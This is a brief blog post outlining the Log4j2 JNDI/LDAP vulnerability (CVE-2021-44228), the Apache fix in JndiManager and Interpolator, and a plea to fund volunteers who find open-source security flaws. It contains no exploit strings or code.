Notes on Apache Log4j2 issue, fix, lessons learned and next steps

  • what caused the security issue in Apache Log4j2
  • fix provided by the Apache team for this issue
  • lessons learned
  • how we all can help Open Source in locating this kind of security issues and fixing them

About the issue

Arbitrary code loaded from LDAP servers:

Log4j2 String interpolation issue

Fix Details

Fix in the JndiManager.java
version 2.15.0 JndiManager.java
Fix in the Interpolator.java
Stronger Open Source! Image Credit: Google Chromecast

Lessons Learned

  • A voluntary movement to find these kind of issues in our Open Source software.
  • These volunteers should be awarded for their proof-of-work in locating and fixing this kind of issues. Similar to Prof. Donald Knuth’s reward check.
  • Users of Open Source software can fund these efforts. This will make our Open Source more successful. As we know Open Source is the backbone to the growth of our Software Industry.
  • Let us make it healthier and stronger!
Let us help! Image Credit: Google Chromecast

References

  1. CVE-2021–44228
  2. Remove static dependency on JndiLookup.class
  3. Khousik from Java Brains explains the issue in details

--

--

--

Improving Agriculture, Healthcare… Equality for All, Love and Respect Nature. https://mohan-chinnappan-n.github.io/about/cv.html

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Scrum is just a continuous improvement

Deploying Django Apps on Heroku

Non-Technically: Technical Debt

Debugging flaky infinite loops

Ken Woodward Completes AEM Sites DevOps Certification

Let’s dive into head first Java

The HTTP of VR

CSS Grid — An Intro

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Mohan Chinnappan

Mohan Chinnappan

Improving Agriculture, Healthcare… Equality for All, Love and Respect Nature. https://mohan-chinnappan-n.github.io/about/cv.html

More from Medium

The Lego Approach to Bridging the Developer Gap

What is SDLC? And how do release management platforms like dyrector.io fit into the lifecycle?

By using release management tools, companies can increase the efficiency of operational efforts of the SDLC.

Teamwork makes the Dream Work

Tracking Software Development Team’s Output Velocity